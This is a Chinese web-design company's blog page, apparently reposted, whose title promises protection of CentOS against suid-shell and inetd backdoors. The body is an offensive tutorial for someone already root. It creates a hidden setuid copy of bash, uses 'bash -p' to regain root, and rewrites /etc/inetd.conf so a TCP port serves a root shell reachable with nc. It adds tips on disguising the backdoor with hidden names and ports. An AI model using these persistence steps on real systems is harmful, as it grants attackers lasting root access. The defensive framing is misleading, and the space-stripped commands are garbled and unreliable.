如何防止CentOS被suidshell与inetd后门利用-成都快上网建站

如何防止CentOS被suidshell与inetd后门利用

本篇内容主要讲解“如何防止CentOS被suid shell与inetd后门利用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何防止CentOS被suid shell与inetd后门利用”吧!

为洛宁等地区用户提供了全套网页设计制作服务,及洛宁网站建设行业解决方案。主营业务为成都网站设计、成都做网站、洛宁网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!

你现在已经是root用户,想留一个后门。

如何防止CentOS被suid shell与inetd后门利用

系统环境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切换成为root用户,并执行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

当然,你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件(在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏).

现在,做为一个普通用户,我们来启用这个后门:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

为什么不行呢?

因为bash3针对suid有一些护卫的措施.但这也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p参数来获取一个rootshell.这个euid的意思是effectiveuserid(关于这些ID的知识,可以戳这里)

这里要特别注意的是,作为一个普通用户执行这个SUIDshell时,一定要使用全路径。

小知识:

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

这时就会返回具有SUID位的文件啦。

2.远程后门:利用/etc/inetd.conf

我们使用vi来修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改为:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

开启inetd:

dawg:~#inetd

如果要强制重启inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

现在我们就可以用nc来爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小贴士:

我们可以修改/etc/services文件,加入以下的东西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我们可以修改成一些常见的端口,以实现隐藏。

到此,相信大家对“如何防止CentOS被suid shell与inetd后门利用”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!


当前文章:如何防止CentOS被suidshell与inetd后门利用
本文路径:http://kswjz.com/article/ieeosp.html
扫二维码与项目经理沟通

我们在微信上24小时期待你的声音

解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流